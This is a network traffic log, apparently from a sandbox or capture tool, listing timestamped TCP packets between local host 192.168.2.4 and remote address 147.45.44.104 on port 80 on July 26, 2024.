Jul 26, 2024 18:56:48.624114037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624125004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624135971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624145985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624150038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624157906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624169111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624176025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624181986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624193907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624197960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624208927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624211073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624223948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624233007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624238014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624249935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624259949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624260902 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.624274969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.624298096 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625039101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625051022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625061035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625072956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625082970 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625088930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625093937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625102043 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625108004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625118017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625118971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625129938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625140905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625142097 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625154018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625166893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625168085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625179052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625181913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625193119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625204086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.625205994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625228882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.625242949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626188993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626207113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626219034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626230955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626240969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626241922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626255035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626256943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626270056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626277924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626281977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626291990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626296043 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626308918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626317978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626321077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626334906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626339912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626348019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626359940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626359940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626382113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626393080 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626904011 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626916885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626926899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626939058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626950979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626952887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626964092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.626972914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.626976013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627000093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627021074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627461910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627475023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627487898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627499104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627501011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627513885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627525091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627526999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627537966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627549887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627552032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627563953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627574921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627574921 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627588034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627599955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627604008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627608061 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627614021 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627620935 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.627638102 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.627660036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628421068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628433943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628444910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628457069 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628460884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628468990 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628475904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628494978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628505945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628508091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628521919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628532887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628535032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628545046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628556013 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628556967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628571033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628582001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628582001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628596067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628604889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628607988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.628618956 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.628643990 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629406929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629420042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629431009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629441977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629451036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629455090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629467964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629473925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629481077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629498005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629498005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629509926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629513979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629523993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629535913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629537106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629549026 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629554033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629561901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629575014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.629578114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629599094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.629620075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630167961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630204916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630254030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630268097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630279064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630289078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630290031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630304098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630306005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630317926 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630323887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630350113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630805969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630819082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630830050 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630841017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630842924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630852938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630865097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630866051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630877018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630888939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630889893 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630899906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630906105 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630913019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630924940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630934954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630935907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630949020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630954981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630960941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.630970955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.630997896 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631797075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631808996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631819963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631830931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631838083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631844044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631858110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631860018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631870031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631880999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631891966 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631894112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631894112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631905079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631916046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631918907 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631933928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631943941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631944895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631958008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631961107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.631969929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.631983042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632005930 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632806063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632817984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632827997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632838964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632849932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632853031 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632862091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632873058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632874012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632885933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632889032 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632899046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632910967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632915974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632925034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632936954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632942915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632950068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632958889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.632961988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632972956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.632987976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.633013010 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.633616924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.633629084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.633639097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.633651018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.633658886 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.633662939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.633676052 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.633677006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.633687973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.633701086 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.633717060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.633742094 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634270906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634284019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634294987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634305954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634316921 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634320974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634330034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634341002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634341002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634355068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634365082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634367943 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634385109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634385109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634398937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634401083 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634411097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634424925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634426117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634438992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.634439945 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634459019 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.634480953 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635166883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635179996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635190010 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635200024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635210991 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635212898 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635222912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635235071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635236979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635247946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635251999 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635261059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635272980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635278940 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635286093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635298967 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635303974 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635312080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635320902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635324955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635337114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.635346889 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.635374069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636142015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636153936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636164904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636174917 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636179924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636188030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636200905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636204958 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636213064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636224031 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636229992 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636235952 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636248112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636248112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636259079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636265039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636272907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636284113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636293888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636297941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636306047 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.636317015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636332035 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.636357069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637022018 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637034893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637044907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637057066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637065887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637068033 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637079954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637080908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637094021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637114048 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637132883 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637567997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637579918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637589931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637599945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637603998 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637613058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637625933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637634039 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:48.637638092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637651920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:48.637655973 CEST	49757	80	192.168.2.4	147.45.44.104
